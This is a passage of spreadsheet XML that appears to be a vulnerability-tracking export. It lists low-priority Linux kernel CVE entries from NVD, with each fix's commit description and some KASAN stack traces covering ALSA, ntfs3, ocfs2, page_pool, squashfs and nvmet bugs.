SOF treats the topology mixer min and max values as non-negative indices
into its volume table. It stores them in signed fields, allocates max + 1
entries through an int argument, and later indexes the table with the
stored range.
An inverted range is invalid, while a maximum at or above INT_MAX cannot
be represented safely after the increment or in the signed fields.
Validate the complete range before storing it or allocating the table.</t>
        </is>
      </c>
      <c r="T564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90196</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90197</t>
        </is>
      </c>
      <c r="D565" s="5" t="inlineStr"/>
      <c r="E565" s="5" t="inlineStr"/>
      <c r="F565" s="5" t="inlineStr"/>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="inlineStr"/>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr"/>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q565" s="5" t="inlineStr"/>
      <c r="R565" s="5" t="inlineStr"/>
      <c r="S565" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: haptic: don't write an uninitialized value to unhandled usages
fill_effect_buf() initializes value only for the four haptic usages
handled by its switch, but writes it to field-&gt;value[] for every usage.
An unhandled usage can therefore receive either an uninitialized value
or one left over from the previous usage. hid_output_report() then
serializes that value into the effect's report buffer.
Skip unhandled usages instead. This also matches switch_mode(), which
only updates fields it recognizes.
Found with Clang's -Wconditional-uninitialized.</t>
        </is>
      </c>
      <c r="T565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90197</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90198</t>
        </is>
      </c>
      <c r="D566" s="5" t="inlineStr"/>
      <c r="E566" s="5" t="inlineStr"/>
      <c r="F566" s="5" t="inlineStr"/>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="inlineStr"/>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q566" s="5" t="inlineStr"/>
      <c r="R566" s="5" t="inlineStr"/>
      <c r="S566" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: core: Fix use-after-free in snd_card_do_free()
A use-after-free was detected in snd_card_do_free() when a sound card
managed by devres is unbound while a user-space application still holds an
open file descriptor.
For managed cards, the memory is allocated using devres_alloc(), and its
release function is set to __snd_card_release(), which calls
snd_card_free(). When the device is unbound, the unbind thread calls
snd_card_free(), which drops a reference to the card's device. If the user
thread still has an open file descriptor, the reference count does not
reach zero, and the unbind thread blocks on wait_for_completion(&amp;released).
When the user thread closes the file descriptor, it drops the final
reference, invoking the device release callback release_card_device(),
which calls snd_card_do_free(). snd_card_do_free() performs cleanup and
calls complete(card-&gt;release_completion). This wakes up the unbind thread,
which returns from snd_card_free() and __snd_card_release(). The devres
core then immediately frees the memory block containing the snd_card
structure.
Meanwhile, the user thread continues execution in snd_card_do_free() and
evaluates `if (!card-&gt;managed)`. It reads the `managed` boolean from the
snd_card structure that was just freed by the unbind thread, triggering a
KASAN use-after-free.
Fix this by caching the value of card-&gt;managed in a local variable before
calling complete(). This ensures that the card pointer is not dereferenced
after the unbind thread has been woken up and potentially freed the card.
BUG: KASAN: use-after-free in snd_card_do_free sound/core/init.c:604
[inline]
BUG: KASAN: use-after-free in release_card_device+0x1ab/0x1b0
sound/core/init.c:153
Read of size 1 at addr ffff8881912ec909 by task syz-executor130/5857
Call Trace:
 &lt;TASK&gt;
 dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120
 print_address_description+0x55/0x1e0 mm/kasan/report.c:378
 print_report+0x58/0x70 mm/kasan/report.c:482
 kasan_report+0x117/0x150 mm/kasan/report.c:595
 snd_card_do_free sound/core/init.c:604 [inline]
 release_card_device+0x1ab/0x1b0 sound/core/init.c:153
 device_release+0xc4/0x1f0 drivers/base/core.c:-1
 kobject_cleanup lib/kobject.c:689 [inline]
 kobject_release lib/kobject.c:720 [inline]
 kref_put include/linux/kref.h:65 [inline]
 kobject_put+0x222/0x550 lib/kobject.c:737
 snd_card_file_remove+0x331/0x390 sound/core/init.c:1125
 snd_pcm_release+0x12c/0x160 sound/core/pcm_native.c:2986
 __fput+0x418/0xa50 fs/file_table.c:512
 fput_close_sync+0x11f/0x240 fs/file_table.c:617
 __do_sys_close fs/open.c:1511 [inline]
 __se_sys_close fs/open.c:1496 [inline]
 __x64_sys_close+0x7e/0x110 fs/open.c:1496
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90198</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90199</t>
        </is>
      </c>
      <c r="D567" s="5" t="inlineStr"/>
      <c r="E567" s="5" t="inlineStr"/>
      <c r="F567" s="5" t="inlineStr"/>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="inlineStr"/>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q567" s="5" t="inlineStr"/>
      <c r="R567" s="5" t="inlineStr"/>
      <c r="S567" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: reject out-of-range evcn in mi_enum_attr()
In mi_enum_attr(), the start/end VCN validation for non-resident
attributes is:
	if (svcn &gt; evcn + 1) goto out;
When evcn is U64_MAX the "evcn + 1" expression wraps to 0 and any svcn
passes the check. For evcn values close to U64_MAX (but not equal to it)
the right-hand side is still a meaningless near-wrap upper bound, so a
malformed on-disk attribute with svcn == 0 and evcn near U64_MAX can pass
mi_enum_attr() unrejected.
VCN (virtual cluster number) is a cluster index, so any valid evcn is
bounded by the volume's total cluster count, which ntfs3 holds in
sbi-&gt;used.bitmap.nbits (set up in ntfs_init_from_boot() before any caller
of mi_enum_attr() runs). Reject evcn values that fall outside this range.
However, an empty non-resident attribute (no allocated clusters) is
legitimately encoded with svcn == 0 and evcn == -1 (U64_MAX), e.g. via
attr-&gt;nres.evcn = cpu_to_le64((u64)vcn - 1) with vcn == 0. That sentinel
must keep passing, so exclude evcn == U64_MAX from the range check. The
existing "svcn &gt; evcn + 1" test still tolerates the sentinel ("0 &gt; 0" is
false) and continues to require svcn == 0 for it, while the range check
rejects every other out-of-range evcn and thereby also defuses the
"evcn + 1" wraparound.
svcn does not need its own bound: once evcn &lt; nbits, "svcn &gt; evcn + 1"
implies svcn &lt;= nbits.
[almaz.alexandrovich@paragon-software.com: fixed evcn check]</t>
        </is>
      </c>
      <c r="T567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90199</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90200</t>
        </is>
      </c>
      <c r="D568" s="5" t="inlineStr"/>
      <c r="E568" s="5" t="inlineStr"/>
      <c r="F568" s="5" t="inlineStr"/>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="inlineStr"/>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q568" s="5" t="inlineStr"/>
      <c r="R568" s="5" t="inlineStr"/>
      <c r="S568" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: fix integer overflow in MFT cluster validation
In ntfs_init_from_boot(), the boot sector's MFT cluster numbers are
validated against the volume size with:
	if (mlcn  * sct_per_clst &gt;= sectors ||
	    mlcn2 * sct_per_clst &gt;= sectors)
		goto out;
mlcn and mlcn2 are u64 fields read directly from the boot sector.
sct_per_clst is bounded above by 4096 (true_sectors_per_clst() plus
the is_power_of_2() check below it), but the multiplication is done
in u64 and wraps when mlcn (or mlcn2) is large enough -- e.g. mlcn
near 2^62 with sct_per_clst == 4 wraps to 0, which compares below
any non-zero 'sectors', so the check is bypassed and the malformed
record is accepted.
The accepted mlcn is then used unchanged in
	sbi-&gt;mft.lbo = mlcn &lt;&lt; cluster_bits;
In practice the resulting reads fail at the block layer (sb_bread()
returns NULL via grow_buffers()'s check_mul_overflow() guard), so
today this manifests as mount failing in odd places rather than as
something more dangerous, but the validation step is still wrong
and there is no reason for callers to rely on the block layer to
catch a value that should never have been accepted in the first
place.
Use check_mul_overflow() to compute the two sector positions and
fail the mount if either multiplication wraps; this preserves the
existing semantics (mlcn * sct_per_clst &gt;= sectors) instead of
switching to division (mlcn &gt;= sectors / sct_per_clst), which
would tighten the check at edge cases where 'sectors' is not a
multiple of sct_per_clst.  The check_*_overflow() style is the
one ntfs3 already uses for similar on-disk arithmetic in
fs/ntfs3/run.c.</t>
        </is>
      </c>
      <c r="T568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90200</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90201</t>
        </is>
      </c>
      <c r="D569" s="5" t="inlineStr"/>
      <c r="E569" s="5" t="inlineStr"/>
      <c r="F569" s="5" t="inlineStr"/>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="inlineStr"/>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q569" s="5" t="inlineStr"/>
      <c r="R569" s="5" t="inlineStr"/>
      <c r="S569" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: page_pool: fix UAF in __page_pool_release_netmem_dma on xa_cmpxchg race
This bug was discovered while testing the hns3 driver under channel
reconfiguration (`ethtool -L` / `ethtool -G`) with iperf3 traffic on
arm64. The race is intermittently triggered when page_pool_destroy()
runs page_pool_scrub() concurrently with page return via
page_pool_put_netmem() on a different CPU. A WARN in
page_pool_clear_pp_info() surfaced the dangling DMA index bits left
by the cmpxchg loser, which led to the investigation.
page_pool_scrub() iterates pool-&gt;dma_mapped via xa_for_each() with no
page ref held. __page_pool_release_netmem_dma() currently reads and
writes netmem fields (dma_addr, DMA index bits in pp_magic) after
xa_cmpxchg() returns. The unref path calls put_page() unconditionally
regardless of the cmpxchg outcome; when it loses the cmpxchg, it still
frees the page before the scrub winner finishes these netmem accesses,
so scrub touches a freed page -- a Use-After-Free.
Fix this by splitting the DMA release into two functions:
1. __page_pool_unmap_netmem_dma() caches dma_addr before xa_cmpxchg(),
   does the cmpxchg to remove the DMA mapping, and calls dma_unmap on
   the cached address. It never touches netmem fields after the cmpxchg,
   making it safe for the scrub path which holds no page ref.
2. __page_pool_release_netmem_dma() wraps the above and additionally
   clears dma_addr and DMA index bits in netmem fields. This is safe
   only when the caller holds a page ref, so it is used by the return
   path (page_pool_return_netmem).
The scrub path calls __page_pool_unmap_netmem_dma() directly; the return
path calls __page_pool_release_netmem_dma().</t>
        </is>
      </c>
      <c r="T569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90201</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90202</t>
        </is>
      </c>
      <c r="D570" s="5" t="inlineStr"/>
      <c r="E570" s="5" t="inlineStr"/>
      <c r="F570" s="5" t="inlineStr"/>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="inlineStr"/>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q570" s="5" t="inlineStr"/>
      <c r="R570" s="5" t="inlineStr"/>
      <c r="S570" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: mpt3sas: Avoid freeing unallocated PCIe SGL buffers
_base_release_memory_pools() unconditionally frees every
ioc-&gt;pcie_sg_lookup[] entry, including ones the setup loop never
allocated after a partial failure, causing a "bad dma" warning on debug
kernels or a NULL pointer dereference otherwise.</t>
        </is>
      </c>
      <c r="T570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90202</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90203</t>
        </is>
      </c>
      <c r="D571" s="5" t="inlineStr"/>
      <c r="E571" s="5" t="inlineStr"/>
      <c r="F571" s="5" t="inlineStr"/>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="inlineStr"/>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q571" s="5" t="inlineStr"/>
      <c r="R571" s="5" t="inlineStr"/>
      <c r="S571" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Squashfs: check block offset is not negative
If a negative offset is read off disk (for example the offset into the
decompressed fragment block), this will cause squashfs_copy_data() to
perform an out of bounds access.
Fix by checking if offset is negative, and returning 0.  This matches
existing behaviour where an offset beyond the block returns 0 bytes
copied.
To trigger this out of bounds access requires a crafted Squashfs
filesystem and CAP_SYS_ADMIN to mount it.  Unprivileged users will not be
able to mount such a filesystem, but once mounted, an unprivileged user
can trigger the out of bounds access by reading the crafted file with the
negative offset.</t>
        </is>
      </c>
      <c r="T571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90203</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90204</t>
        </is>
      </c>
      <c r="D572" s="5" t="inlineStr"/>
      <c r="E572" s="5" t="inlineStr"/>
      <c r="F572" s="5" t="inlineStr"/>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="inlineStr"/>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q572" s="5" t="inlineStr"/>
      <c r="R572" s="5" t="inlineStr"/>
      <c r="S572" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate DIO orphan slot during inode read
[BUG]
A corrupted append-DIO dinode (high byte at offset 0xa1
corrupted from 0 to 1) can carry an i_dio_orphaned_slot
outside the mounted filesystem slot range and trigger a
use-after-free error:
BUG: KASAN: slab-use-after-free in ocfs2_get_system_file_inode+0x780/0x820 fs/ocfs2/sysfile.c:102
Read of size 8 at addr ffff88800b767c00 by task kworker/u8:3/85
Call Trace:
 ...
 ocfs2_get_system_file_inode+0x780/0x820 fs/ocfs2/sysfile.c:102
 ocfs2_wipe_inode+0x292/0xf70 fs/ocfs2/inode.c:840
 ocfs2_delete_inode fs/ocfs2/inode.c:1155 [inline]
 ocfs2_evict_inode+0x6c9/0x1170 fs/ocfs2/inode.c:1295
 evict+0x38e/0x8f0 fs/inode.c:810
 iput_final fs/inode.c:1914 [inline]
 iput fs/inode.c:1966 [inline]
 iput+0x55b/0x8b0 fs/inode.c:1926
 ocfs2_recover_orphans+0x610/0xe40 fs/ocfs2/journal.c:2374
 ocfs2_complete_recovery+0x5af/0xd00 fs/ocfs2/journal.c:1373
 ...
[CAUSE]
ocfs2_del_inode_from_orphan() uses i_dio_orphaned_slot to index the
slot-local system inode cache. The dinode validator does not check
this active slot, so an out-of-range value produces an invalid cache
entry pointer that is dereferenced as an inode pointer.
[FIX]
Reject an active i_dio_orphaned_slot outside the slot range during
dinode validation, before DIO orphan recovery can consume it.</t>
        </is>
      </c>
      <c r="T572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90204</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90205</t>
        </is>
      </c>
      <c r="D573" s="5" t="inlineStr"/>
      <c r="E573" s="5" t="inlineStr"/>
      <c r="F573" s="5" t="inlineStr"/>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="inlineStr"/>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q573" s="5" t="inlineStr"/>
      <c r="R573" s="5" t="inlineStr"/>
      <c r="S573" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate orphan slot during inode read
Patch series "ocfs2: validate active orphan slots during inode read".
OCFS2 trusts active ordinary and append-DIO orphan slots read from dinodes.
A corrupted slot can therefore index osb_orphan_wipes or the slot-local
system-inode cache outside their allocations before the corruption is
reported.
Patch 1 validates the ordinary orphan slot used by inode wipe processing.
Patch 2 validates the append-DIO orphan slot used by DIO completion and
orphan recovery.  Both checks reject corrupt metadata at the existing inode
validation boundary.
This patch (of 2):
[BUG]
A corrupted dinode with OCFS2_ORPHANED_FL can carry an
i_orphaned_slot outside the mounted filesystem slot range.
ocfs2_wipe_inode() uses it to index osb_orphan_wipes before looking
up the orphan directory, causing an out-of-bounds memory access.
BUG: KASAN: slab-use-after-free in ocfs2_get_system_file_inode+0x780/0x820 fs/ocfs2/sysfile.c:102
Read of size 8 at addr ffff88800b767c00 by task kworker/u8:3/85
Call Trace:
 ...
 ocfs2_get_system_file_inode+0x780/0x820 fs/ocfs2/sysfile.c:102
 ocfs2_wipe_inode+0x292/0xf70 fs/ocfs2/inode.c:840
 ocfs2_delete_inode fs/ocfs2/inode.c:1155 [inline]
 ocfs2_evict_inode+0x6c9/0x1170 fs/ocfs2/inode.c:1295
 evict+0x38e/0x8f0 fs/inode.c:810
 iput_final fs/inode.c:1914 [inline]
 iput fs/inode.c:1966 [inline]
 iput+0x55b/0x8b0 fs/inode.c:1926
 ocfs2_recover_orphans+0x610/0xe40 fs/ocfs2/journal.c:2374
 ocfs2_complete_recovery+0x5af/0xd00 fs/ocfs2/journal.c:1373
 ...
[CAUSE]
ocfs2_validate_inode_block() validates i_suballoc_slot but leaves
the active ordinary orphan slot unchecked. Downstream consumers
assume that the value is smaller than osb-&gt;max_slots.
[FIX]
Reject an active i_orphaned_slot outside the slot range during
dinode validation, before the inode reaches orphan wipe processing.</t>
        </is>
      </c>
      <c r="T573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90205</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90206</t>
        </is>
      </c>
      <c r="D574" s="5" t="inlineStr"/>
      <c r="E574" s="5" t="inlineStr"/>
      <c r="F574" s="5" t="inlineStr"/>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="inlineStr"/>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr"/>
      <c r="K574" s="5" t="inlineStr"/>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q574" s="5" t="inlineStr"/>
      <c r="R574" s="5" t="inlineStr"/>
      <c r="S574" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet: fix max_qid race between configfs and controller allocation
The function nvmet_subsys_attr_qid_max_store() can race against
nvmet_alloc_ctrl() when a subsystem's max_qid limit is modified.
Suppose max_qid is currently 64. If nvmet_alloc_ctrl() executes:
ctrl-&gt;sqs = kzalloc_objs(struct nvmet_sq *, subsys-&gt;max_qid + 1);
and at this exact point, a userspace process changes max_qid to 128,
nvmet_subsys_attr_qid_max_store() will set the new max_qid value. It
attempts to delete active controllers to force a reconnect, but the
new controller won't be deleted because it hasn't been added to the
subsys-&gt;ctrls list yet.
nvmet_alloc_ctrl() then proceeds and adds the new controller to the
subsys-&gt;ctrls list. Later, when nvmet_install_queue() is called, it
will see max_qid set to 128, but the memory allocated for sqs is only
sized for 64 entries. This results in a KASAN out-of-bounds warning
and potential memory corruptions.
Fix this by protecting the queue allocations and list insertion in
nvmet_alloc_ctrl() with down_read(&amp;nvmet_config_sem). Because
nvmet_subsys_attr_qid_max_store() acquires down_write(&amp;nvmet_config_sem)
to modify the attribute, this safely prevents the configfs writer from
modifying max_qid during controller creation.
Copy the max_qid from the subsystem to the controller's structure
during the allocation; ctrl-&gt;max_qid never changes as long as the
controller remains in LIVE state, so this will prevent similar race
conditions.</t>
        </is>
      </c>
      <c r="T574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90206</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90207</t>
        </is>
      </c>
      <c r="D575" s="5" t="inlineStr"/>
      <c r="E575" s="5" t="inlineStr"/>
      <c r="F575" s="5" t="inlineStr"/>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="inlineStr"/>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr"/>
      <c r="K575" s="5" t="inlineStr"/>
      <c r="L575" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q575" s="5" t="inlineStr"/>
      <c r="R575" s="5" t="inlineStr"/>
      <c r="S575" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: seq: midi: Serialize input teardown with event_input
snd_midi_input_event() must not be running while a rawmidi substream is
closing, since this can lead to the trigger state becoming out-of-step
through this sequence in snd_rawmidi_input_trigger():
	snd_rawmidi_input_trigger(up=0)
					snd_midi_input_event()
					 -&gt; snd_rawmidi_kernel_read()
					     -&gt; snd_rawmidi_input_trigger(up=1)
	  -&gt; cancel_work_sync()
which ends with the underlying device being active unexpectedly.
When this is called from close_substream(), further input can re-trigger
the input event leaving it running after rawmidi_release_priv() has set
rfile-&gt;rmidi to NULL which leads to:
	Unable to handle kernel NULL pointer dereference at virtual address 00000000000000b0
	Call trace:
	 snd_midi_input_event+0x3c/0x134 [snd_seq_midi] (P)
	 snd_rawmidi_input_event_work+0x1c/0x2c
	 process_one_work+0x150/0x3a4
	 worker_thread+0x190/0x318
Apply a similar approach to commit ef7607ab1c8ad ("ALSA: seq: midi:
Serialize output teardown with event_input") which fixed the same issue
in the output direction, but updated to use RCU following Takashi Iwai's
proposed follow-on patch [1].
With this change in place, midisynth_unsubscribe() clears the input file
so snd_midi_input_event() will not re-trigger the stream and will be
quiesced by the cancel_work_sync() in snd_rawmidi_input_trigger().
[1] https://lore.kernel.org/linux-sound/20260813144224.753399-1-tiwai@suse.de/</t>
        </is>
      </c>
      <c r="T575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90207</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
